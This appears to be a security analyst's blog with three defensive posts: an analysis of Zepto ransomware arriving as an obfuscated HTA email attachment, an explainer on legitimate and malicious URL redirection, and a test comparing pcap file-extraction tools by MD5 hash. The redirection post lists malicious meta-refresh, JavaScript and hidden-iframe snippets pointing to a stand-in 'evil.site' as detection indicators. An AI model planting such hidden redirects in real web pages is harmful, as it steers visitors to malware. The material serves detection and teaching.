Zepto Ransomware, The New Kid in Town

HTA Downloader delivers Zepto Ransomware

Attack Vector: Email Attachment
Malicious File: it5Ax.hta

The Zepto sample that we found this morning came in as a zipped email attachment that contained an HTML Application (.hta) file. HTA files are a combination of HTML and one or more scripting languages like VBScript or JScript. A quick look at this file below shows it is a combination of HTML with obfuscated JScript. One of the significant dangers with HTA files is once the file is downloaded and run, it is treated as a “fully trusted application”. Whereas when a regular HTML file is run the execution is confined to the security model of the web browser.

We’ve seen Zepto and its cousin Locky arrive in DOCM attachments in recent months and I am not surprised to see the evolution to HTA files. DOCM which stands for Document with Macros is a special document with embedded scripts written in VBA (Visual Basic Application). Macros however don’t run by themselves and require user assistance. Weather the file is an HTA or a DOCM, the result is the same; once run it downloads the malware from its C2 and runs it.

HTA Encoded JScript Downloader
HTA Encoded JScript Downloader
Exploit and Post Infection Traffic
Exploit and Post Infection Traffic

Post Compromise your files will be encrypted and file extensions changed to .zepto similar to Locky which changes your file extensions to .locky.

Post Compromise the file extensions changed to .zepto
Post Compromise the file extensions changed to .zepto

How to pay instructions will appear on the user Desktop and in every directory explaining your predicament.

Desktop Image displays Instructions
Desktop Image displays Instructions

Your personal identification ID in the help message is the same as the first half of each scrambled filename.

Locky and Zepto Ransomware are similar in several regards, for example both are distributed primarily in massive spam campaigns via zipped JScript attachments and they both leave behind the same type of files including a similar ransom note.

We expect to see more malware payloads sent as HTA documents so take a few precautions such as:

  • Change settings in control panel to show file extensions to protect against misleading file names.
  • Configure Office settings to not allow macros in documents to run from the internet.
  • Always open .JS files in Notepad.
  • Backup your files regularly.
  • Treat all attachments as suspect.

URL Redirection, the good and the bad

URL redirection also called URL forwarding is not all malicious and has valid and acceptable uses. The technique allows servers to redirect a client request to a different location of a page, site or domain for legitimate reasons. In a redirect a web browser attempts to open a URL and that request is forwarded on to another location. Some of the legitimate reasons for URL redirection include:

Device targeting
A very common example of this is redirecting users to a mobile version of a website. If a user browses a site with a mobile client they could automatically be forwarded to a corresponding mobile version of a website.

Geo targeting
Typically seen on sites targeting larger audiences in more then one location essentially redirects users to more relevant localized content.

Removing referer details
When a link is clicked the browser sends the referer field which could contain sensitive URLs that end up in the server logs of an external site. for example, http://packetreport.com/future-plans would not be a desirable referer field leaving an organization, a redirection page would remove the exposure.

Similar domain names
Users might type in a misspelled domain such as packtereport.com and get redirected to our actual site packetreport.com. This safeguards both the audience as well as the organization.

Redirection Used in Exploits
As a security analyst we see this everyday of the week, a user suddenly sets off an IDS alert for touching a known malware site or bad domain. I am always curious to see why this happened and in most cases the user did one of three things clicked a link or opened a document in a phish or browsed a compromised site that has a malicious redirect configured. The following examples are not a complete list of techniques but the most common malicious redirects.

HTTP Redirects
The HTTP 3xx Redirection status code indicates the client must take additional action to complete the request. Many of these status codes are used in URL redirection the three most common are 301 Moved Permanently, 302 Found and 307 Temporary Redirection.

301 Moved Permanently This is known as a permanent redirect and is used to indicate that the originating URL has permanently moved to a new location.

302 Found Indicates the target resource resides temporarily under a different URI.

307 Temporary Redirect The target resource resides temporarily under a different URI and the user agent must not change the request method if it performs an automatic redirection to that URI.

HTML Redirects
This is a client-side redirection and tells the browser to request another page.

To create an HTML redirect page, you use the HTML meta tag, along with the ‘http-equiv’ and ‘content’ attributes. Meta Refresh is a special meta tag contained with the header section of the HTML source. This will refresh the page to the new site listed after the url field. The number after content attribute is the seconds to load, if set to 0 it redirects immediately as the page is loading.

What to look for:

  • <meta http-equiv=”Refresh” content=”0; url=http://www.evil.site/” />

Javascript Redirects
A common method of redirecting users via JavaScript is performed without any user input. In JavaScript a redirect script uses the same code to load a page.

What to look for:

  • “text/javascript”>window.location=’http://evil.site’
  • “text/javascript”>window.location.reload(“http://evil.site”)
  • “text/javascript”>window.location.replace(“http://evil.site”)
  • “text/javascript”>document.location.href =’http://evil.site’

iframe/Frameset Redirects
This is a method where the content of another page is shown within an iframe or frameset, so that it looks like the content is part of the original URL. Especially dangerous are hidden iframe with a width and/or height values of 0 or a few pixels are hardly visible to the user.

What to look for:

  • <iframe src=”hxxp://evil.site/count.php?o=1″ width=0 height=0 style=”hidden” frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>


These methods explained above are not new and revolutionary, hard to detect or very sneaky but they do work and malware authors will continue to use them in the future. Redirecting users to malicious content using http redirects or embedded iFrames is not going to trend downwards or cease to be a easy way to deliver malicious content anytime soon. Detecting the redirect using IDS signatures or black lists and blocking the subsequent chain is always key.



Python Script

Simple script that follows the HTTP redirections and displays the resulting HTTP Status Codes

—————–   http-redirect.py     ——————-
import requests
r = requests.get(‘http://evil.site’)
for h in r.history:
print ‘[%s] %s’ % (h.status_code, h.url,)
print ‘[%s] %s’ % (r.status_code, r.url,)



Network Packet Capture File Extraction Analysis

There are many tools available to security analysts that are used to export files from network packet captures commonly called pcap files. In many companies today security analysts only have these pcap files as the only evidence available that contain the files that transmit their networks. Exporting the complete file and maintaining file integrity is paramount in any cyber investigation. I have known for a long time some tools are better then others for this purpose but not until recently during an investigation where I exported a file using two separate tools on the same pcap file resulted in two different MD5 hashs for the same file. Hence the reason for the analysis in today’s post.

We chose four popular tools for this test that are known industry wide and commonly found in many Security Analysts toolkits. Three of the tools are open source Wireshark, BRO and Chaosreader and we are also testing a professional version of NetworkMiner. For consistency sake we are using a packet capture from our friends at malware-traffic-analysis.net which contains a nasty flash exploit file.

Packet Capture

We downloaded the 2016-04-13-pseudo-Darkleech-Angler-EK-after-medical-library.net-first-run.pcap from malware-traffic-analysis April 2016 archive.


Wireshark                                                               https://www.wireshark.org/

Wirehark is the world’s foremost network protocol analyzer and used to examine packet capture files and capture network traffic.

After importing the pcap we downloaded we can see in tcp-stream 3 a Flash file was requested via a HTTP request Method GET and intimately downloaded via HTTP 200 response code with a file signature starting with CWS.

There are a couple methods to export a file in Wireshark but I will use the menu bar in this test.

In the Menu Select File > Export Objects > HTTP. This packet capture contains two Flash file we are going to test the 66 kB Flash file.

Select the file content type application/x-shockwave-flash.and chose Save As to save to disk.

Verify the md5 hash

Wireshark MD5 – 246690cd9b09f84456ddab98261510bd

Bro                                                                                 https://www.bro.org/bro-exchange-2013/exercises/faf.html

Bro Network Security Monitor (Bro) is a powerful network analysis framework that is commonly used for intrusion detection and analyzing packet capture files. Bro’s powerful analysis engine makes it adept at high-performance network monitoring, protocol analysis, and real-time application layer state information. In our analysis we will leverage the extract-all.bro script available on bro.org site see the url above.

Run the following command to export all files contained in the packet capture. Files will export into a directory export_files.

The script will drop all the files in a folder called extract_files; our file was renamed HTTP-FMBqgK2b8aa54wu7mc.

Verify the md5 hash

Bro MD5 – 246690cd9b09f84456ddab98261510bd

Chaosreader                                  http://www.brendangregg.com/chaosreader.html

Chaosreader is open source tool designed to aid in tracing TCP/UDP network sessions and file extraction and produces detailed HTML output which displays connection information in packet captures.

The file is renamed to session_0004.part_01.data however a view of the file properties confirms its our file.


Chaosreader MD5 – fc193d580ba0e80e20707baeb7f71f20

NetworkMiner                                                                      http://www.netresec.com/?page=NetworkMiner

One of the great features of NetworkMiner is host identification and file extraction. To get started we imported our pcap to the professional version of NetworkMiner.

Select File Import and select the Files Tab presents all files contained in the packet capture.

Right Select the Flashfile listed as x-shockwave-flash and Choose Open folder

Copy the file to disk


Verify the md5 hash                                                                                              Upload the file to Virustotal to confirm the md5 hash and community analysis

Note the MD5 hash is a match for two previous tests and the community AV results confirm its a known Flash exploit.


NetworkMiner MD5 246690cd9b09f84456ddab98261510bd


Of the four tools we analyzed we saw three tools export the complete file intact according to the MD5 hash. The tool that didn’t export the complete file in this test was Chaosreader. The lesson here is there are numerous tools security analysts use to resurrect files from pcaps but some tools preform better or more consistent then others so buyer beware. Our analysis was admittedly simplistic we didn’t test large files or files transmitted over various protocols such as SSH, SMB or FTP which we believe also will produce differing results between tools, we will save that for future article.